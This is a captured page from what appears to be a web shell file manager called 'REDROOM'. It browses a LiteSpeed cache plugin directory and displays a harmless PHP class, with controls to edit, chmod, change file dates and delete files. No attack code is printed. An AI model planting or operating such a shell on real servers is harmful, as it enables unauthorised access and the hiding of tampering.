REDROOM
PHP 8.2.31
Path:
Logout
Edit File
Size: 1.09 KB
Close
/proc/thread-self/root/usr/local/lsws/add-ons/webcachemgr/src/Panel/CustomPanelBase.php
Text
Base64
<?php /** ****************************************** * LiteSpeed Web Server Cache Manager * * @author LiteSpeed Technologies, Inc. (https://www.litespeedtech.com) * @copyright (c) 2020-2023 * @since 1.10 * ******************************************* */ namespace Lsc\Wp\Panel; abstract class CustomPanelBase extends ControlPanel { /** * The following functions deal with apache configuration files and * server/virtual host cache roots and will never be called in the * CustomPanel context. They are included here to meet abstract function * requirements in parent class ControlPanel. * */ protected function initConfPaths() {} protected function serverCacheRootSearch() {} protected function vhCacheRootSearch() {} protected function addVHCacheRootSection( array $file_contents, $vhCacheRoot = 'lscache' ) {} public function verifyCacheSetup() {} public function createVHConfAndSetCacheRoot( $vhConf, $vhCacheRoot = 'lscache' ) {} public function applyVHConfChanges() {} }
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 0 × Files: 6
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
ControlPanel.php
30.49 KB
lrw-rw-r--
2026-05-26 17:51:34
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
CPanel.php
23.89 KB
lrw-rw-r--
2026-05-26 17:51:34
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
CustomPanelBase.php
1.09 KB
lrw-rw-r--
2026-05-26 17:51:34
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
CustomPanelExample.php
3.69 KB
lrw-rw-r--
2026-05-26 17:51:34
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
DirectAdmin.php
15.16 KB
lrw-rw-r--
2026-05-26 17:51:34
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Plesk.php
11.95 KB
lrw-rw-r--
2026-05-26 17:51:34
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).